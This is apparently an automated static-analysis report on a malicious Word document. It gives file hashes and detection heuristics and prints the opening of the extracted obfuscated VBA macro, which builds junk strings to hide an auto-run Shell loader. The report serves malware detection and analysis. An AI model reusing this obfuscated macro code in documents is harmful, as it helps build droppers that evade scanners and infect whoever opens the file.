Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 99eb1d90eb5f0d01…

MALICIOUS

Office (OLE)

212.5 KB Created: 2018-04-13 12:19:00 Authoring application: Microsoft Office Word First seen: 2019-01-11
MD5: 16ba8f5d604b4b9a366ae2d5b2107e68 SHA-1: 878f05a0ddc78db92cd844b5d13be93e7b25f343 SHA-256: 99eb1d90eb5f0d012f35fcc2a7dedd2229312794354843637ebb7f40b74d0809
282 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic

The file contains heavily obfuscated VBA macros, including an auto-exec loader in the Document_Open macro. Critical heuristics indicate the use of Shell() calls, which are likely used to execute arbitrary commands. The VBA code appears to be designed to download and execute a second-stage payload, though the exact URL or command is obfuscated.

Heuristics 7

  • ClamAV: Doc.Malware.Chronos-6897935-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Chronos-6897935-0
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://ns.adobe.com/xap/1.0/ In document text (OLE body)
    • http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OLE body)
    • http://ns.adobe.com/photoshop/1.0/In document text (OLE body)
    • http://purl.org/dc/elements/1.1/In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/sType/ResourceEvent#In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/sType/ResourceRef#In document text (OLE body)
    • http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 55040 bytes
SHA-256: a4564577d986a60cc198637beef5f22eb9b48d2b7f830bad03591dded325bb5c
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Public Function zxOInozC() As String
    FuwkI = Right("bzmZkcyxico", 5)
    DRcvPe = Space(9)
    KrhJJsT = Mid("LMVofAsyucLphOZo", 1, 7)
    buix = LTrim("BatTuwXghQaiSmPOCGD")
    LwSt = Space(8)
    AyyF = LTrim("hZxZofdppdcZaH")
    bzvKd = StrConv("pPWGYgALyTn", 0)
    Jhczuz = StrReverse("xXHaYVlayCuuZkjCi")
    peeIley = Right("PtYwReVssPhzLPlAQ", 2)
    ubftsy = Space(6)
    sqnB = Space(5)
    UJZet = Mid("afsEZJPlgBksslOkT", 1, 6)
    JljTw = Mid("LxuUMtRhEi", 1, 6)
    qjtDWm = Replace("EjqkHRQQuJmcG", "Ejqk", "iYybEI")
    gkoy = RTrim("brfwKlGODjFdARK")
    dcbC = RTrim("LfYKOwiKAUSmpDepSVw")
    yTVaoy = UCase("fHLXccfzZzXKfti")
    PbGu = Space(9)
    vJOY = StrReverse("RTymuoQhKLOsiVw")
    ALSnWPy = Right("aOpeQFOiRusI", 5)
    wgsZLF = RTrim("KwCBIBFruDzZVa")
    uGAJ = Replace("aEvAUjWHepmHC", "aEvA", "OwLcZz")
        If STXicg = 49 + 6430 Then
        trpjb = Replace("bQmhHhzffXbLvUzUMH", "bQmh", "tgnA")
        trpjb = StrReverse("bQmhHhzffXbLvUzUMH")
    End If
    XOOI = Replace("VUhmkFlrmFXCjIU", "VUhm", "DsprfPA")
    eOOD = RTrim("hKWzsaGGjxjIvWdDsyG")
    KRodo = Mid("lYbYdjIqrMJcc", 2, 6)
    FiksYIm = RTrim("GcaXtiWDGWjI")
    angl = LTrim("jWenprXivEbOQpHXGi")
    fnYWTAK = StrConv("zIwMmSDtcolfX", 0)
    gIUUSjT = UCase("MnMvxIVpgC")
    IPbxlP = StrReverse("TxobfMaqJgrCRprzyE")
    UUvzVRn = Left("RhWiCpAGYLhiYSKIoz", 6)
    PctdT = RTrim("yBpGOZkZdKJzbpk")
    XZYBIn = UCase("VyqZCEdEkPBE")
    UIot = Left("xfzrIgnpWDvZpPel", 5)
    XYiE = StrReverse("MngsiDRkIbpfV")
    tPQGAo = Mid("MqEUDadWJQbjeVAvHT", 1, 5)
    ZzRHB = Mid("HIbDcWbpnOzqG", 1, 6)
    ldMt = Replace("HoMdaySFCwYMP", "HoMd", "HIuKI")
    TxFdwzu = Right("fpYoBnrzvdYhKDS", 4)
    lheVT = Space(5)
    Rnci = Left("fKFgOMBKWqen", 4)
    ycFVnn = Replace("FySkBVIBuigGkMrW", "FySk", "GOxvM")
    EhOphG = LTrim("cwEGOdLgBVvwHLqQHFB")
    gVIDF = UCase("wovLMbkeoH")
    bnqE = Right("ByEYPSGjgkfwbwDIdP", 2)
    hCHXy = UCase("kZcdGEAdiXodhrF")
    KgyyY = Space(7)
    gBeRz = Right("wqzcMaesnaSmWMFrb", 6)
    PVhqy = Mid("efERzRrXMsldofqFCZ", 1, 5)
    Moan = StrConv("lacJJeWwzoXbB", 0)
    MGyC = StrReverse("YJTHAlgWTQqMz")
    ljczTjq = StrReverse("gypSMHzickxOQ")
        If UUOTiP = 145 + 330 Then
        czLgX = Replace("cgTGdHJsAlncLsWD", "cgT", "yZWMOqR")
        czLgX = StrReverse("cgTGdHJsAlncLsWD")
        dqKKH = Replace("yUmxLtHeXAnXYsIWwfm", "yUmx", "hGvvB")
        dqKKH = StrReverse("yUmxLtHeXAnXYsIWwfm")
    End If
    ndrF = Space(5)
    nIfL = RTrim("LBjbzEXlPRQZnClIBo")
    uAsDe = StrConv("EsdqjaLzYqziXdzoS", 0)
    YcWBlVF = StrConv("wLIfwKzeHZhpMofvIUS", 0)
    ivcm = Space(7)
    tQmfkw = LTrim("sSCJhqdMDKtWHgU")
        If jVRbTH = 66 + 16 Then
        hHJPZ = Replace("SiyePCkxrmQphPDMpMv", "Siye", "ZGmKhbP")
        hHJPZ = StrReverse("SiyePCkxrmQphPDMpMv")
        GSAEt = Replace("YiDhhCOUvwunBX", "YiDh", "TauX")
        GSAEt = StrReverse("YiDhhCOUvwunBX")
    End If
    LhFpby = LTrim("ffmgPfupTcpEXjgshW")
    OFHIJDZ = Mid("nqHUpJrcgU", 1, 7)
    AxETG = Left("goYTFEeaXdWKFsCdVW", 3)
    EMMgHzv = Space(6)
    CxfI = Mid("QYdjDtBccK", 2, 5)
    ZfPa = UCase("EKgGfibzKQAyxf")
        If MxdYLb = 144 + 2801 Then
        GhwlQ = Replace("zHEnfEqLwciCeqzlf", "zHE", "VksQr")
        GhwlQ = StrReverse("zHEnfEqLwciCeqzlf")
    End If
    ELQRY = UCase("IOZcDlDdJTmZavVlzB")
        If qKSFrS = 37 + 7671 Then
        TEOwg = Replace("PiiHqTOBjrtz", "Pii", "dfUEcu")
        TEOwg = StrReverse("PiiHqTOBjrtz")
    End If
    FjCmPJ = Right("zrtmgbuTxnVrrMs", 5)
    VqiueF = Right("hpHSgEfpoEWD", 6)
        If oZzlmA = 86 + 5507 Then
        MyJRa = Replace("DIWrrpUHVY", "DIWr", "PAlXrz")
        MyJRa = StrReverse("DIWrrpUHVY")
    End 
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.